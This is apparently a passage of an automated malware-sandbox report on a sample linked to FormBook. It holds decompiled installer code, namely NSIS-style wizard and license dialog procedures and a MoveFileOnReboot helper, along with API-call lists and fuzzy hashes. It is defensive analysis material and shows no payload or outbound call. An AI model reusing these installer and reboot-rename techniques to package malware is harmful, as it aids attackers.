                                                                          				return 0;
                                                                          			}


                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                          • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                          • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                          • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction ID: 3db6d43e7298555dcf4dff8a2b3941d8b970aa0790ce639d0d6929768a694480
                                                                          • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction Fuzzy Hash: F5014C78A10208EFCB51DF98D580A9DBBF5EB09220B1085D6E818E7311E330AE509B40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                          				void* _v84;
                                                                          				void* _v88;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t33;
                                                                          				signed int _t35;
                                                                          				struct HWND__* _t37;
                                                                          				struct HWND__* _t47;
                                                                          				struct HWND__* _t65;
                                                                          				struct HWND__* _t71;
                                                                          				struct HWND__* _t84;
                                                                          				struct HWND__* _t89;
                                                                          				struct HWND__* _t97;
                                                                          				int _t101;
                                                                          				int _t104;
                                                                          				struct HWND__* _t117;
                                                                          				struct HWND__* _t120;
                                                                          				signed int _t122;
                                                                          				struct HWND__* _t127;
                                                                          				long _t132;
                                                                          				int _t134;
                                                                          				int _t135;
                                                                          				struct HWND__* _t136;
                                                                          				void* _t139;
                                                                          
                                                                          				_t135 = _a8;
                                                                          				if(_t135 == 0x110 || _t135 == 0x408) {
                                                                          					_t33 = _a12;
                                                                          					_t117 = _a4;
                                                                          					__eflags = _t135 - 0x110;
                                                                          					 *0x79f56c = _t33;
                                                                          					if(_t135 == 0x110) {
                                                                          						 *0x7a2f84 = _t117;
                                                                          						 *0x79f57c = GetDlgItem(_t117, 1);
                                                                          						_t89 = GetDlgItem(_t117, 2);
                                                                          						_push(0xffffffff);
                                                                          						_push(0x1c);
                                                                          						 *0x79e548 = _t89;
                                                                          						E00403DA7(_t117);
                                                                          						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
                                                                          						 *0x7a274c = E00401410(4);
                                                                          						_t33 = 1;
                                                                          						__eflags = 1;
                                                                          						 *0x79f56c = 1;
                                                                          					}
                                                                          					_t120 =  *0x409284; // 0xffffffff
                                                                          					_t132 = (_t120 << 6) +  *0x7a2fa0;
                                                                          					__eflags = _t120;
                                                                          					if(_t120 < 0) {
                                                                          						L38:
                                                                          						E00403DF3(0x40b);
                                                                          						while(1) {
                                                                          							_t35 =  *0x79f56c;
                                                                          							 *0x409284 =  *0x409284 + _t35;
                                                                          							_t132 = _t132 + (_t35 << 6);
                                                                          							_t37 =  *0x409284; // 0xffffffff
                                                                          							__eflags = _t37 -  *0x7a2fa4;
                                                                          							if(_t37 ==  *0x7a2fa4) {
                                                                          								E00401410(1);
                                                                          							}
                                                                          							__eflags =  *0x7a274c;
                                                                          							if( *0x7a274c != 0) {
                                                                          								break;
                                                                          							}
                                                                          							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                                                          							if(__eflags >= 0) {
                                                                          								break;
                                                                          							}
                                                                          							_push( *((intOrPtr*)(_t132 + 0x24)));
                                                                          							_t122 =  *(_t132 + 0x14);
                                                                          							_push(0x7ab000);
                                                                          							E004059E1(_t117, _t122, _t132);
                                                                          							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                                          							_push(0xfffffc19);
                                                                          							E00403DA7(_t117);
                                                                          							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                                          							_push(0xfffffc1b);
                                                                          							E00403DA7(_t117);
                                                                          							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                                          							_push(0xfffffc1a);
                                                                          							E00403DA7(_t117);
                                                                          							_t47 = GetDlgItem(_t117, 3);
                                                                          							__eflags =  *0x7a300c;
                                                                          							_t136 = _t47;
                                                                          							if( *0x7a300c != 0) {
                                                                          								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                                                          								__eflags = _t122;
                                                                          							}
                                                                          							ShowWindow(_t136, _t122 & 0x00000008);
                                                                          							EnableWindow(_t136, _t122 & 0x00000100);
                                                                          							E00403DC9(_t122 & 0x00000002);
                                                                          							EnableWindow( *0x79e548, _t122 & 0x00000004);
                                                                          							SendMessageA(_t136, 0xf4, 0, 1);
                                                                          							__eflags =  *0x7a300c;
                                                                          							if( *0x7a300c == 0) {
                                                                          								_push( *0x79f57c);
                                                                          							} else {
                                                                          								SendMessageA(_t117, 0x401, 2, 0);
                                                                          								_push( *0x79e548);
                                                                          							}
                                                                          							E00403DDC();
                                                                          							E004059BF(0x79f580, 0x7a2780);
                                                                          							_push( *((intOrPtr*)(_t132 + 0x18)));
                                                                          							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                                                          							E004059E1(_t117, 0, _t132);
                                                                          							SetWindowTextA(_t117, 0x79f580);
                                                                          							_push(0);
                                                                          							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                                                          							__eflags = _t65;
                                                                          							if(_t65 != 0) {
                                                                          								continue;
                                                                          							} else {
                                                                          								__eflags =  *_t132 - _t65;
                                                                          								if( *_t132 == _t65) {
                                                                          									continue;
                                                                          								}
                                                                          								__eflags =  *(_t132 + 4) - 5;
                                                                          								if( *(_t132 + 4) != 5) {
                                                                          									DestroyWindow( *0x7a2758);
                                                                          									 *0x79ed58 = _t132;
                                                                          									__eflags =  *_t132;
                                                                          									if( *_t132 > 0) {
                                                                          										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
                                                                          										__eflags = _t71;
                                                                          										 *0x7a2758 = _t71;
                                                                          										if(_t71 != 0) {
                                                                          											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                                          											_push(6);
                                                                          											E00403DA7(_t71);
                                                                          											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
                                                                          											ScreenToClient(_t117, _t139 + 0x10);
                                                                          											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
                                                                          											_push(0);
                                                                          											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                                                          											ShowWindow( *0x7a2758, 8);
                                                                          											E00403DF3(0x405);
                                                                          										}
                                                                          									}
                                                                          									goto L58;
                                                                          								}
                                                                          								__eflags =  *0x7a300c - _t65;
                                                                          								if( *0x7a300c != _t65) {
                                                                          									goto L61;
                                                                          								}
                                                                          								__eflags =  *0x7a3000 - _t65;
                                                                          								if( *0x7a3000 != _t65) {
                                                                          									continue;
                                                                          								}
                                                                          								goto L61;
                                                                          							}
                                                                          						}
                                                                          						DestroyWindow( *0x7a2758);
                                                                          						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                                                          						__eflags =  *0x7a2f84;
                                                                          						EndDialog(_t117,  *0x79e950);
                                                                          						goto L58;
                                                                          					} else {
                                                                          						__eflags = _t33 - 1;
                                                                          						if(_t33 != 1) {
                                                                          							L37:
                                                                          							__eflags =  *_t132;
                                                                          							if( *_t132 == 0) {
                                                                          								goto L61;
                                                                          							}
                                                                          							goto L38;
                                                                          						}
                                                                          						_push(0);
                                                                          						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                                                          						__eflags = _t84;
                                                                          						if(_t84 == 0) {
                                                                          							goto L37;
                                                                          						}
                                                                          						SendMessageA( *0x7a2758, 0x40f, 0, 1);
                                                                          						__eflags =  *0x7a274c;
                                                                          						return 0 |  *0x7a274c == 0x00000000;
                                                                          					}
                                                                          				} else {
                                                                          					_t117 = _a4;
                                                                          					if(_t135 == 0x47) {
                                                                          						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
                                                                          					}
                                                                          					if(_t135 == 5) {
                                                                          						asm("sbb eax, eax");
                                                                          						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
                                                                          					}
                                                                          					if(_t135 != 0x40d) {
                                                                          						__eflags = _t135 - 0x11;
                                                                          						if(_t135 != 0x11) {
                                                                          							__eflags = _t135 - 0x10;
                                                                          							if(_t135 != 0x10) {
                                                                          								L14:
                                                                          								__eflags = _t135 - 0x111;
                                                                          								if(_t135 != 0x111) {
                                                                          									L30:
                                                                          									return E00403E0E(_t135, _a12, _a16);
                                                                          								}
                                                                          								_t134 = _a12 & 0x0000ffff;
                                                                          								_t127 = GetDlgItem(_t117, _t134);
                                                                          								__eflags = _t127;
                                                                          								if(_t127 == 0) {
                                                                          									L17:
                                                                          									__eflags = _t134 - 1;
                                                                          									if(_t134 != 1) {
                                                                          										__eflags = _t134 - 3;
                                                                          										if(_t134 != 3) {
                                                                          											__eflags = _t134 - 2;
                                                                          											if(_t134 != 2) {
                                                                          												L29:
                                                                          												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                                                          												goto L30;
                                                                          											}
                                                                          											__eflags =  *0x7a300c;
                                                                          											if( *0x7a300c == 0) {
                                                                          												_t97 = E00401410(3);
                                                                          												__eflags = _t97;
                                                                          												if(_t97 != 0) {
                                                                          													goto L30;
                                                                          												}
                                                                          												 *0x79e950 = 1;
                                                                          												L25:
                                                                          												_push(0x78);
                                                                          												L26:
                                                                          												E00403D80();
                                                                          												goto L30;
                                                                          											}
                                                                          											E00401410(_t134);
                                                                          											 *0x79e950 = _t134;
                                                                          											goto L25;
                                                                          										}
                                                                          										__eflags =  *0x409284;
                                                                          										if( *0x409284 <= 0) {
                                                                          											goto L29;
                                                                          										}
                                                                          										_push(0xffffffff);
                                                                          										goto L26;
                                                                          									}
                                                                          									_push(1);
                                                                          									goto L26;
                                                                          								}
                                                                          								SendMessageA(_t127, 0xf3, 0, 0);
                                                                          								_t101 = IsWindowEnabled(_t127);
                                                                          								__eflags = _t101;
                                                                          								if(_t101 == 0) {
                                                                          									goto L61;
                                                                          								}
                                                                          								goto L17;
                                                                          							}
                                                                          							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                                                          							if(__eflags != 0) {
                                                                          								goto L30;
                                                                          							}
                                                                          							_t104 = IsWindowEnabled( *0x79e548);
                                                                          							__eflags = _t104;
                                                                          							if(_t104 != 0) {
                                                                          								goto L30;
                                                                          							}
                                                                          							_t135 = 0x111;
                                                                          							_a12 = 1;
                                                                          							goto L14;
                                                                          						}
                                                                          						SetWindowLongA(_t117, 0, 0);
                                                                          						return 1;
                                                                          					} else {
                                                                          						DestroyWindow( *0x7a2758);
                                                                          						 *0x7a2758 = _a12;
                                                                          						L58:
                                                                          						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                                                          							ShowWindow(_t117, 0xa);
                                                                          							 *0x7a0580 = 1;
                                                                          						}
                                                                          						L61:
                                                                          						return 0;
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                          • ShowWindow.USER32(?), ref: 00403918
                                                                          • DestroyWindow.USER32 ref: 0040392C
                                                                          • SetWindowLongA.USER32 ref: 0040394A
                                                                          • IsWindowEnabled.USER32 ref: 00403975
                                                                          • GetDlgItem.USER32 ref: 004039A3
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                          • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                          • GetDlgItem.USER32 ref: 00403A6A
                                                                          • GetDlgItem.USER32 ref: 00403A74
                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                          • GetDlgItem.USER32 ref: 00403B86
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                          • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                          • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                          • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                          • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                          • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                          • String ID:
                                                                          • API String ID: 3950083612-0
                                                                          • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                          • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                          • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                          • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			/* Dialog procedure of the installer's license page (the code matches the NSIS installer stub's
                                                                          			   LicenseProc, i.e. packaging, not the FormBook payload). _a4 = hwndDlg, _a8 = uMsg,
                                                                          			   _a12 = wParam, _a16 = lParam. Comments were added for review; the decompiled statements are unchanged. */
                                                                          			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                          				char* _v8;          // TEXTRANGE.lpstrText in the WM_NOTIFY path, EDITSTREAM.pfnCallback in WM_INITDIALOG
                                                                          				signed int _v12;    // TEXTRANGE.chrg.cpMax / EDITSTREAM.dwError
                                                                          				void* _v16;         // TEXTRANGE.chrg.cpMin / EDITSTREAM.dwCookie
                                                                          				struct HWND__* _t52;
                                                                          				long _t86;
                                                                          				int _t98;
                                                                          				struct HWND__* _t99;
                                                                          				signed int _t100;
                                                                          				intOrPtr _t109;
                                                                          				int _t110;
                                                                          				signed int* _t112;
                                                                          				signed int _t113;
                                                                          				char* _t114;
                                                                          				CHAR* _t115;
                                                                          
                                                                          				if(_a8 != 0x110) {                                   // 0x110 = WM_INITDIALOG
                                                                          					if(_a8 != 0x111) {                               // 0x111 = WM_COMMAND
                                                                          						L11:
                                                                          						if(_a8 != 0x4e) {                            // 0x4e = WM_NOTIFY
                                                                          							if(_a8 == 0x40b) {                       // WM_USER+0xb: application-defined
                                                                          								 *0x79f568 =  *0x79f568 + 1;         // "ignore WM_COMMAND" counter++
                                                                          							}
                                                                          							L25:
                                                                          							_t110 = _a16;
                                                                          							L26:
                                                                          							return E00403E0E(_a8, _a12, _t110);      // default handling for everything else
                                                                          						}
                                                                          						_t52 = GetDlgItem(_a4, 0x3e8);               // control 1000: the rich-edit license text
                                                                          						_t110 = _a16;                                // NMHDR* (ENLINK* or MSGFILTER*)
                                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {   // code == EN_LINK && msg == WM_LBUTTONDOWN
                                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));   // ENLINK.chrg.cpMax
                                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));   // ENLINK.chrg.cpMin
                                                                          							_v12 = _t100;                            // TEXTRANGE.chrg.cpMax
                                                                          							_v16 = _t109;                            // TEXTRANGE.chrg.cpMin
                                                                          							_v8 = 0x7a1f20;                          // TEXTRANGE.lpstrText: static URL buffer
                                                                          							if(_t100 - _t109 < 0x800) {              // clicked link must fit the 2048-byte buffer
                                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);    // EM_GETTEXTRANGE: copy the link text out of the control
                                                                          								SetCursor(LoadCursorA(0, 0x7f02));       // IDC_WAIT
                                                                          								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);   // hand the URL to its registered handler, SW_SHOWNORMAL
                                                                          								SetCursor(LoadCursorA(0, 0x7f00));       // IDC_ARROW
                                                                          								_t110 = _a16;
                                                                          							}
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {   // not (EN_MSGFILTER && WM_KEYDOWN)
                                                                          							goto L26;
                                                                          						} else {
                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {           // MSGFILTER.wParam == VK_RETURN
                                                                          								SendMessageA( *0x7a2f84, 0x111, 1, 0);           // WM_COMMAND IDOK to the outer wizard window
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {          // VK_ESCAPE
                                                                          								SendMessageA( *0x7a2f84, 0x10, 0, 0);            // WM_CLOSE
                                                                          							}
                                                                          							return 1;
                                                                          						}
                                                                          					}
                                                                          					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {       // HIWORD(wParam) != BN_CLICKED, or commands are being ignored
                                                                          						goto L25;
                                                                          					} else {
                                                                          						_t112 =  *0x79ed58 + 0x14;                   // &page->flags
                                                                          						if(( *_t112 & 0x00000020) == 0) {            // flag 0x20: page forces an accept/decline choice
                                                                          							goto L25;
                                                                          						}
                                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;   // flags bit 0 := BM_GETCHECK of control 1034 ("accept" radio)
                                                                          						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);   // enable or disable the Next button accordingly
                                                                          						E0040417A();
                                                                          						goto L11;
                                                                          					}
                                                                          				}
                                                                          				// WM_INITDIALOG: lParam points at the page descriptor
                                                                          				_t98 = _a16;
                                                                          				_t113 =  *(_t98 + 0x30);                             // string id of the license text
                                                                          				if(_t113 < 0) {
                                                                          					_t113 =  *( *0x7a275c - 4 + _t113 * 4);          // negative id: indirect through the language table
                                                                          				}
                                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                          				_t114 = _t113 +  *0x7a2fb8;                          // pointer into the installer's string block
                                                                          				_push(0x22);
                                                                          				_a16 =  *_t114;                                      // first byte selects the EM_STREAMIN format (plain text or RTF)
                                                                          				_v12 = _v12 & 0x00000000;                            // EDITSTREAM.dwError = 0
                                                                          				_t115 = _t114 + 1;                                   // license text follows the format byte
                                                                          				_v16 = _t115;                                        // EDITSTREAM.dwCookie = text pointer
                                                                          				_v8 = E00403EBB;                                     // EDITSTREAM.pfnCallback
                                                                          				E00403DA7(_a4);                                      // apply a page string (pushed: 0x22 and the id from +0x34)
                                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                          				_push(0x23);
                                                                          				E00403DA7(_a4);                                      // apply a second page string (0x23, id from +0x38)
                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);   // tick control 1034 if already selected or no choice is forced, else 1035
                                                                          				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);   // enable Next on the same condition
                                                                          				_t99 = GetDlgItem(_a4, 0x3e8);                       // rich-edit control 1000
                                                                          				E00403DDC(_t99);                                     // make it the active control
                                                                          				SendMessageA(_t99, 0x45b, 1, 0);                     // EM_AUTOURLDETECT on: this is what makes the EN_LINK clicks above possible
                                                                          				_t86 =  *( *0x7a2f88 + 0x68);                        // license background colour from the installer header
                                                                          				if(_t86 < 0) {
                                                                          					_t86 = GetSysColor( ~_t86);                      // negative value encodes a system colour index
                                                                          				}
                                                                          				SendMessageA(_t99, 0x443, 0, _t86);                  // EM_SETBKGNDCOLOR
                                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);             // EM_SETEVENTMASK ENM_LINK | ENM_KEYEVENTS: feeds the WM_NOTIFY branch
                                                                          				 *0x79e54c =  *0x79e54c & 0x00000000;                // bytes-streamed counter = 0
                                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));       // EM_EXLIMITTEXT to the license length
                                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);             // EM_STREAMIN(format, &EDITSTREAM)
                                                                          				 *0x79f568 =  *0x79f568 & 0x00000000;                // "ignore WM_COMMAND" counter = 0
                                                                          				return 0;
                                                                          			}

                                                                          Address column for the listing above (one entry per C-code line, alignment lost in extraction): 0x00403eff to 0x0040416e.


                                                                          APIs
                                                                          • CheckDlgButton.USER32 ref: 00403F7A
                                                                          • GetDlgItem.USER32 ref: 00403F8E
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                          • GetSysColor.USER32(?), ref: 00403FBD
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                          • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                          • GetDlgItem.USER32 ref: 00404065
                                                                          • SendMessageA.USER32(00000000), ref: 00404068
                                                                          • GetDlgItem.USER32 ref: 00404093
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                          • LoadCursorA.USER32 ref: 004040E2
                                                                          • SetCursor.USER32(00000000), ref: 004040EB
                                                                          • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                          • LoadCursorA.USER32 ref: 0040410B
                                                                          • SetCursor.USER32(00000000), ref: 0040410E
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: N$open
                                                                          • API String ID: 3615053054-904208323
                                                                          • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                          • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                          • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                          • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 94%
                                                                          			/* Rename-or-delete-on-reboot helper (matches the NSIS installer stub's MoveFileOnReboot).
                                                                          			   _a4 = existing file, _v0 = new name (NULL means delete); _a16 is reused as the ReadFile byte count.
                                                                          			   Comments were added for review; the decompiled statements are unchanged. */
                                                                          			E00405707(long _a4, long _a16) {
                                                                          				CHAR* _v0;                                           // second argument, not recovered in the prototype
                                                                          				intOrPtr* _t13;
                                                                          				long _t14;
                                                                          				int _t19;
                                                                          				void* _t27;
                                                                          				long _t28;
                                                                          				intOrPtr* _t36;
                                                                          				int _t42;
                                                                          				intOrPtr* _t43;
                                                                          				long _t48;
                                                                          				CHAR* _t50;
                                                                          				void* _t52;
                                                                          				void* _t54;
                                                                          
                                                                          				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");      // resolve MoveFileExA at run time (absent on Windows 9x)
                                                                          				_t50 = _v0;
                                                                          				if(_t13 != 0) {
                                                                          					_t19 =  *_t13(_a4, _t50, 5);                      // MOVEFILE_REPLACE_EXISTING | MOVEFILE_DELAY_UNTIL_REBOOT
                                                                          					if(_t19 != 0) {
                                                                          						L16:
                                                                          						 *0x7a3010 =  *0x7a3010 + 1;                  // reboot-required counter
                                                                          						return _t19;
                                                                          					}
                                                                          				}
                                                                          				// Fallback: queue the operation in %WINDIR%\wininit.ini, section [Rename]
                                                                          				 *0x7a1710 = 0x4c554e;                                // tmpbuf = "NUL" (a NUL target deletes the source file)
                                                                          				if(_t50 == 0) {
                                                                          					L5:
                                                                          					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);   // 8.3 name of the existing file
                                                                          					if(_t14 != 0 && _t14 <= 0x400) {
                                                                          						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);   // rename line "new=old\r\n"; _t42 = its length
                                                                          						GetWindowsDirectoryA(0x7a1188, 0x3f0);
                                                                          						lstrcatA(0x7a1188, "\\wininit.ini");
                                                                          						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);   // GENERIC_READ|GENERIC_WRITE, no sharing, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_SEQUENTIAL_SCAN
                                                                          						_t54 = _t19;
